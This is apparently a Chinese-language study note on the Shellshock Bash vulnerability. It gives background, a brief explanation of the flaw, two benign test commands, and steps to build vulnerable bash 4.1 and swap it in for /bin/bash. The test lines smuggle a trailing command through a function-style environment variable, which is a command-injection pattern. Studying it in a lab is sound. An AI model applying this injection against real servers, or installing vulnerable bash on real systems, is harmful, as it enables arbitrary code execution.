Shellshock攻击

Shellshock背景

2014年9月24日，Bash程序被发现存在一个严重的安全漏洞。攻击者可以利用该漏洞在被影响的服务器上执行任意代码。这个严重的安全漏洞被称为 Shellshock漏洞。

漏洞原理

Bash源代码variables.c这个文件中有下面这段代码：
这个函数的作用是读取环境变量的值并转换成函数，由于他只判断了值的头没有判断尾，故只要在尾部加入攻击语句就会执行

测试方法

方法一：

export foo='() { echo "hello world"; }; echo "extra";'
bash

方法二：

env x='() { :;}; echo vulnerable' bash -c "echo this is a test "

环境搭建

sudo apt-get update
sudo apt install gcc make -y  
wget http://ftp.gnu.org/gnu/bash/bash-4.1.tar.gz  
tar xf bash-4.1.tar.gz
cd bash-4.1
./configure
make
sudo make install
sudo rm /bin/bash
ln -s /usr/local/bin/bash /bin